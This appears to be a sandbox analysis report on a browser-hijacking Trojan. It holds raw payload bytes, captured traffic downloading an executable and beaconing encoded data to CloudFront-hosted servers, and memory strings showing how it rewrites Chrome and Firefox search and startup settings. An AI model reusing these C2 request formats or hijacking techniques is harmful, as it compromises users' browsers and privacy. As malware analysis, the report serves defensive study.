~....wR0sx.D..iw..z-..g.....%/....U|..s....xN.hD.'E....DvG....'O..m..b

I%.m..... e$ozE.\..........&.....J...M....6....."...U...v...z8v.3..N..

..\..isE..9...Q........'..o1"[email protected]:............z6:.[: n..

.%...i..U..-..x..........u...3.T.u<..k......a..q...A.=[[email protected]?*r......

...K'.9.g..GU..5.}tSH.......\.......|..!r.L........?.o....k...e.4...AF

h..l"=......S..f:, 7...>z,...6..C..,.XD.`...2....x49gD.=......KU..u

..v../...'[email protected]".g...&.....wCP=.W.6z

.[.........8AM...O.'...E. [email protected]&.I`...J..&(.*}a.X.-..G6.c^....m...T

W).=Qf..[....X!.nn.......X......l.....D...{q...%!,.....).L:E..b^.b.5..

..A...qU... k.....A..A..%.i...x..'........Wm.....=-.?..2s......1g&].Z.

n...T.q...z.[....C...SUQ...\..?....%D.........-./d.(.....;...2........

..x.%/..ECi%.:...4.T},1rf....... {O.B.<..... ]}.....Z...."...=....&

gt;.^.`u...g....}..].w....U.M......C.iH....~ .VQ.g#.15.Cg....G.k...|.

C..H$.)..a...V)...*....X75NiO... ...H]....;[email protected]>....O... 1M..

...............yhG..F..=}.....1....W...A1..\.J ...x..O..(. .....'..t..

B2.m>gKp`.N`..F/..CrB8.E.^.;..h!.9.O.....m..,n..;'P..v..U...ww.R...

.$^iG...]E...ZF7A..h)'[email protected]).....|....V.J.,.H...4.X.ks.....

e.N.[[email protected])...w...4.W........".e.].....8........t..#..........

giJeZ.......E..Ow..k...X......^G#b.=.w..x.2.t..................x.oKM..

d....K..UJb~...X.y..]....u.. ....V6..8.(7.........<....S......P!.A.

;.Jk......Dl^3...3.......S.v.o)j...........9...Ja\.'W.8...;#..]R...V.3

.vz..M)G.?.....X...r4........_.....5.B.B.._I.d.{..rJ ~.T...\.o....

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:03 GMT

Content-Range: bytes 500000-749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 73bYzrGAQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:03 GMT..Content-Range: bytes 50000

0-749999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c41295

fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 73bYzrG

AQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==..G|....F...`#1.G....

.....Wk*..<......3~m._..y3.....t..=is..h._m.M8T.i.K.._u..k.........

AJ.v&-2H.......i..K......-.S.2G...-q..}..])f....ad.j..f..EV.G.}g.NVBSR

!~Ne3..."4........V...{g..i .k.....$v..z:..K......X..;.j(..e.3....p...

c).............qW}i.-....z!.S...]....a.=g_.n....yx.n.y|.a.....\.uy....

....5.~.9I"E..V..R.3XX.[..W.<.XfGK.....`Q.q..|..?.G..........7..M..

.U.-....YzK!....D'.*>...o.~G.b....j...X.=S. .l\v.A..P..}.....h.d.g|

..D:...L.ky...k..jL..o.(.e$|R..[.Y.....|...6*..;3.o...w.i...x%..(]D!n.

..).bK.........<.! [email protected]>.-SU.R/p."..M....o_.i.u... d..{M]...,5j.

<.'........O..L5.l.. S..G.0KD.q.B..^...Vk...}~...*C..^.q... .!....*

0.._...f..j.?.....~ .m..(..]L.kK.......`..h..... ..{......`.jR...$..LI

.,.W...;.mp~2.3.[8mI...f..............K..B..y.?.yk...Mc..J..wX..;.f...

V0.n..T$~...d..f3..;...X......t...=.......W.Q.._../5.)..lF "../.e..=.F

.0...C..... A.*u......hP.o.v.8.........9%....!..0J..ipJb|..e...I..,..N

..9K..c...Sn......\4WA.k.#.....t. 1.}.H.......>.......?.{......

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1000000-1249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GOtOcUaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:06 GMT..Content-Range: bytes 10000

00-1249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: GOtOc

[email protected].wz.F.

.........'..0.{.)U~...N.:?....T.t........SG'/.<..m....:.K...._.....

...\...C.v%.............d..xkD..p8%..].Q.....9.....N\&h.D.q.....u.K.p.

.C..]DsO.....DnP|.?.o.%.........5k..M...9......E.,.6,p.5..W.....i.t...

.HcH..?...6..jR.\....Od.....[...Jg..!....;....F....)~..........W......

*.;.t.....X7...a. :.uw/.S.E....c...`.jj._....D..x..93.....j.......?.V.

....C.=N...v......./....[..zN....g.].4G?y'^q..,.w...).z1...u..,[n?..p.

f..k.....3CE..^.....6.........t.%e......Q]!.#.J.6.(..N..X.#.2W.u#..Tvi

......LA.F...hb...w%..dC.92..9a....~Y...*1.5jM....ZoS........dR....1&-

..~Cy.....^X.<ih..O>..4.......Y.P....L#...~......o.~..4k=..&G.G.

..[. F.... .w./..........^e.oW.Y)....:'.....c......lb.TN.....[.h......

S...x.6..(Ijbj...|F..K.......$e.j.z..4.5.H..........k.J...8q..#....Y93

g.......5TQ..8.$..:.P.k....H.i).9.S..U.H........CsCQd.9f...........&lt

;...MW.(_.......{.k..i..1`..Mx_&.v.y>l^r.H.......o. .&;;.W..F...6..

.1..^.=F..W..=.\.?l..^....4...j....D..'...8]..%Y`....L6...c..U?..H

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2000000-2249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: In5ZPfnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 20000

00-2249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: In5ZP

fnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==....M..HUn.W..=....

Sa..s..Mh.^.B,=..._V.e3F..;...Y.1.r..A.&gS3.....;.l...L........_.....4

..0L77.7,O..(j..~.# ..H{ ..zXg.k......=..5f|.*2./.ie...>..pQD 'A...

...\e..ME.....2....gm.lu....!..9`....{...2IY.^.n.x..$...xl.....0..r...

y[.7B..`..j...PO..?...L...h..........r...........L.ad....uv..X.}......

."...x?...w;....M.M.Vb.....0q.}gUA...G.>..%L.~.....k.!.....i:.5....

...?...1......1......NI..N.....R..<....uv....U.s.B.(.P..pL.s.."..8.

......4&.......[o.bpoJ.."M.b1...'"J.:.(.;->.....&_..E...#....L.Z...

.w.........c".....:..oT.....<....N.!.N...u..c......;.|.C.......A..\

.._ -X....Z...........UDC.1.D".TZ.e5.q.5..x....k>[email protected]

[email protected]>e...N..:O...15Y9.....}.uTa%...N2.>9...[.&S.fc^.."@..

...]s<...~.O.Cn5.'^...e...v.......b...m<...........ww._.p.u.e.61

.gn ...$b"..o.....^.4#]...........t../.xi.../[email protected]}.I.V...G..FB.e.....3Y

.O...^y..*U..^G9..........M....T....W.L.Wn.t.~A.H9G...x..CW.M...n:...f

....4....~.;a........,.2....z... [email protected]*....MM.?..R.....k.

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2500000-2749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UJBgyu-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 25000

00-2749999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UJBgy

u-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==....vH..r...<..X

QR.N.....O3.h.&....nS.:MT.b.$...k.!.i...%.6#...._.7".A:...?...c.N.D...

.;.7..N..`..{[email protected]".....4...../.&H.N..B...*...

'..i...t...{[email protected]=#j..y.-...-..................JCpNR..8^|..%.]0..?...p

g..b.S.=...2..8......)#..v....r.b^Ow.l....St.Kc..Q..p'....=0Up4_..D..y

d..Q.......a...4.4.Q.):...~b..\x.e..M..y 9.30.....`4Z..g....C..*....f.

..(v_)a.5[..>...m....p.x..d#[email protected]*S._.$....v...a..B...XC.)g.7

..........%k..IX.?..J`..>.c..........z.....R..3 ...0^....BL..{.;...

..... 0cc...zR.pL....-.. ..M..8....(&...So..!..R..[.........^.........

.~.e..Z.....|[:.....%<t........k6.X~2..q?aH. ../..(.).8.._..a..:e..

.T7..A.U.....l..........q.."B..e.k.!%Gw..............W..K.T...7e...T..

.U..6.....].so.&.^.......M.E..U.....72\-.\d$wd.........4..B^.....>#

Zx....Y.o.2N.D.dB_.e4.Q..Y...68..*..g.0.....a...Q.k.06...j.x19' @.O&gt

;.'..Y.i]@...U.....dG[.p%.O............c..j..H......Y*.#.N..V.......

6...d.9r.........>mg.....^[email protected]<.....Jz..s.LS.m

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:08 GMT

Content-Range: bytes 3000000-3249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HYkReG18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:08 GMT..Content-Range: bytes 30000

00-3249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: HYkRe

G18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==.._0Z...g..R~*. ...

.t.......Q!."C..*[email protected]_.X..-.9...o.......b....|.......#u.E...

..c.c.......G..{.m.7 .9N...z.R.h.....O.=..L7-..C.Yj....oo..z!. |A...p:

...U.I..R?-....*>....5{.......2X.II....(L[.a....p.1.^5;G$.O".'8 ..

|...\.(..M....SW..%.y.......A$...*...6...H.:R......).2.M-..}.kZ...M..v

.;e......V=-.0.i.,.Z>..M-A..!........z.R...K..:.v.%.fh.....)...o..e

`...Xi..t....6^.Hei*y..D5.C.^..$yr.J!][email protected]_....C.I!&.

y... ...p...P..d...|....&........a..:G.k.`[email protected]

v..}..'...Uk.<02.r...[...=.([email protected]?G...? V..}~y...

.'{[email protected]%'...#L..l.f_oN..;.&.?D.c[..*&

gt; &..t..q....RU1.gn...5.Yn.1...R..;'..."..i..=.9....&..0..;.d..w).Y2

>u..-ID....4..Br<..0...\z.D1......:..../..{..g...t..zt.7....;.'.

.k.q...._..O.\a:8..Xv.........U&...XgrX..t&Q...I @V.ed.RR.c0.).,......

..e)$vf..n..1.V..*...0.Q....(.F..,... t..........u}......0......7}>

..2.....3|[FE.C....."..0...l...Lv5..f..8u...D.....^.-a.....V...!..

<<< skipped >>>

GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHwKTPgWNQH-dElrevhRthrbjMuiZTUQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:20:14 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 27b3a801292660302bc6c8d6a96c71

ce.cloudfront.net (CloudFront)..X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHw

KTPgWNQH-dElrevhRthrbjMuiZTUQ==..

GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5dGyfRyvNsaT36GyavkHw40BfuerDGzXL3efhPpd2OpD9RNXP77kuQ==

....

GET /p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQnzthqVVm6lg-bt7YByOUnE5sU4r-A==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:20:14 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263

c3.cloudfront.net (CloudFront)..X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQ

nzthqVVm6lg-bt7YByOUnE5sU4r-A==..

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2086

Connection: Keep-Alive

Cache-Control: no-cache

d=MtqTE47KGyjjA8zS3H7pJFOADWaZCWMCDWjQ0ujplOd9MbV/lVmWaND 60ePIdsrOcMBzS3H5a0be7N36qAF8kdvdSvmslRxPCNs1oS8WZUOzaar9Egy5SzOr9rhzlAQdf09Xr401steNr mQH VoxX6Rze/7NvJYTdPZS04 jvBMWqv6Qvf9DNZawo3yh8aLrtJikea7Vr6RYlRBKnKPhzN0jVqDPxXWcZpZKsofN7lBOl e1/lbjhigtcqjvKJ0HXl60Dt/azGf4WyQ4pBcaujTuYHUvmbfXoBUdDBpfst5Cnu/6UfyPOPBhh4PvLgPcCVrzCocS421e/NCDWm6mw3fw1TVhnvONcolvvTJMhYKAbBQ6MCy/YiDfDObVBWQ6lOY3KgH2A7Ok2sevxNYKZBkH1lwef5iVaJzvCTQFDpqXuumXfvxH80JeF3wmqbFDzGhyy5ZVQY/zgXrmxAdSaCYQnjsEpKqNUiWYmuW54ILS5IZNtenyQHPVyolqBCD/5l0Jp/pGw/wdklma XkH/sMYQW/q6APL9AZS6vInj5q402KYmuO7uUVWQkNDrUzVQogiSiHUUbkt9xGmkZ3KbvoMG8r9VxUGu2nQcHLKpLbWdCZoCU6lTrA4SDxYt3XQUh14jtaQ6zaqej14QNUX9tuDXbGFU/4ilR5GOuvw37L WtwDUNySQevrJPNOODaBdBZnaFneyb3tAKPGOiQlcUlcnVIrWNWsGrgZefH875FB4dAsQ5PNnszPtZSAO/AudQs9axn3MjcyAgLnSpYGBy1utPgkEJWFebggy2cY1Sa9k zM04yMJWSpAMTxjmcpfDFzOuHVu dUt73kOcovtbTwO1fRDkEvb7nxvf6F9X4XhtGfA6F9un4Sj tycBIXzlj5AJYVGg9CeDOJiHVYEMD6f0Yxw9PvVvnPv67ClaftH4KT2nccqYvSDAOzz7tO5R OJbSC7H67zZblJzmrY3OfIBxIaolmlJImDSsXKAcuKKCKL0Y0Gf/sSMU6n3cHi5Y9Aw06mw26Anf1ZHGdeySNMAGf2g58F8QzEcR48L

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:18 GMT

X-Cache: Miss from cloudfront

Via: 1.1 69ae15d1338b64299d3942a44fc1fb96.cloudfront.net (CloudFront)

X-Amz-Cf-Id: y-P4GnL3XgWw958bmBsKHnH4bmjE4R0VQRvOHKvG4EUsEqr--HSwQg==

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

smu.exe_3356:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

[email protected]

[email protected]

<:>

<:>

t8Ht.HHt#

t8Ht.HHt#

F2t%f

F2t%f

#t.Ht

#t.Ht

2 34 567

2 34 567

j.Yf;

j.Yf;

[email protected]

[email protected]

.PjRW

.PjRW

broken pipe

broken pipe

inappropriate io control operation

inappropriate io control operation

not supported

not supported

operation in progress

operation in progress

operation not permitted

operation not permitted

operation not supported

operation not supported

operation would block

operation would block

protocol not supported

protocol not supported

function not supported

function not supported

operation canceled

operation canceled

address_family_not_supported

address_family_not_supported

operation_in_progress

operation_in_progress

operation_not_supported

operation_not_supported

protocol_not_supported

protocol_not_supported

operation_would_block

operation_would_block

address family not supported

address family not supported

0123456789-

0123456789-

%b %d %H : %M : %S %Y

%b %d %H : %M : %S %Y

%m / %d / %y

%m / %d / %y

%I : %M : %S %p

%I : %M : %S %p

%d / %m / %y

%d / %m / %y

operator

operator

GetProcessWindowStation

GetProcessWindowStation

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

1.2.3

1.2.3

SQLite format 3

SQLite format 3

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

CREATE TABLE sqlite_master(

CREATE TABLE sqlite_master(

sql text

sql text

3.7.2

3.7.2

CREATE TEMP TABLE sqlite_temp_master(

CREATE TEMP TABLE sqlite_temp_master(

208.69.150.250

208.69.150.250

208.69.150.252

208.69.150.252

8.8.8.8

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.ProcessId:

Catcher.Path:

Catcher.Path:

Watcher.Filter:

Watcher.Filter:

2.3.12.1634

2.3.12.1634

smu.exe

smu.exe

Chrome

Chrome

Report.xml

Report.xml

/Url:

/Url:

Report factory:

Report factory:

Update.xml

Update.xml

URLSet

URLSet

Report

Report

homeURL

homeURL

suggestURL

suggestURL

newTabURL

newTabURL

ieSearchURL

ieSearchURL

chSearchURL

chSearchURL

ffSearchURL

ffSearchURL

opSearchURL

opSearchURL

chromeKeyword

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

vup.tmp

Argument.CheckResult:

Argument.CheckResult:

Argument.IsRunning:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report succeeded. TaskId:

Delivery of report failed.

Delivery of report failed.

SHDeleteKeyW

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExA

RegDeleteKeyExW

RegDeleteKeyExW

CCCzdef1,11111111-1111-1111-1111-111111111111

CCCzdef1,11111111-1111-1111-1111-111111111111

NtQueryKey

NtQueryKey

1.3.6.1.4.1.311.2.1.12

1.3.6.1.4.1.311.2.1.12

urls

urls

ERROR: %s

ERROR: %s

SELECT * FROM urls

SELECT * FROM urls

WebData path:

WebData path:

favicon_url

favicon_url

keyword

keyword

originating_url

originating_url

suggest_url

suggest_url

keywords

keywords

keyword LIKE '

keyword LIKE '

WHERE key = 'Default Search Provider ID'

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

DELETE from keywords WHERE id =

search_url

search_url

icon_url

icon_url

startup_urls

startup_urls

chrome_url_overrides

chrome_url_overrides

urls_to_restore_on_startup

urls_to_restore_on_startup

www-searching.com

www-searching.com

template_url_data

template_url_data

image_url_post_params

image_url_post_params

instant_url

instant_url

instant_url_post_params

instant_url_post_params

search_terms_replacement_key

search_terms_replacement_key

new_tab_url

new_tab_url

search_url_post_params

search_url_post_params

suggestions_url

suggestions_url

suggestions_url_post_params

suggestions_url_post_params

chrome_settings_overrides

chrome_settings_overrides

session.startup_urls

session.startup_urls

web_url

web_url

search_icon.png

search_icon.png

X;

X;

%s>

%s>

%s="%s"

%s="%s"

%s='%s'

%s='%s'

version="%s"

version="%s"

encoding="%s"

encoding="%s"

standalone="%s"

standalone="%s"

Snapshot.xml

Snapshot.xml

MozillaFirefox

MozillaFirefox

GoogleChrome

GoogleChrome

AboutTabsUrl

AboutTabsUrl

HomePageUrl

HomePageUrl

DefaultProviderKeyword

DefaultProviderKeyword

UrlsToRestoreOnStartup

UrlsToRestoreOnStartup

StartupHomepageUrl

StartupHomepageUrl

Chrome propagate flags:

Chrome propagate flags:

Firefox propagate flags:

Firefox propagate flags:

ParentKey:

ParentKey:

